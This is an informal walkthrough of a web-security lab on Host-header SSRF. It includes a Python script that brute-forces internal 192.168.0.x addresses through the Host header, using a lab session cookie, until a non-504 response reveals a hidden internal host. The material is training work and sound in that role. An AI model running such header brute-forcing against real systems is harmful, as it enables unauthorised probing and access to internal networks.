imagine we have this website

let’s intercept the request to this website

as we see we got the 200ok response form the website

now let’s try to change the header to the IP address 192.168.0.1 and see what will happen

as we see we go 504 gateway time out

let’s send this to intruder brute force the IP

now let’s start our attack

i will script the vulnerability due to an error in intruder

import requests

url = "<https://0a42005b0328b6128059766600cf0050.web-security-academy.net/>"

for i in range(1,255):
    headers = {
        "Host": f"192.168.0.{i}",
        "Cookie": "session=Ny96CKtVYBXmt7Mybu1KMpASocbNv0pB; _lab=46%7cMCwCFB10fmaJr0VpSZrCKCzXa60ESkhBAhRTmUYf7JxYmfo5FaFsYCE4bov16KHLarsVo2wQx74Psg8OAhW3kOKE9fsaXgq5%2b%2fr1mKH40gr0pp6Z02%2bIiaRuJak46YUx3TASvvFdYMqKcNReggWaBJ%2b0b7AWhgVSTwBjesyESK2x%2bnY%3d",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
    }
    r = requests.get(url,headers=headers)
    if r.status_code == 504:
        pass
    else:
        print(f"Found Valid IP Number: 192.168.0.{i}")
        break

as we see we found a valid IP

okay let’s go

now let’s open the request in browser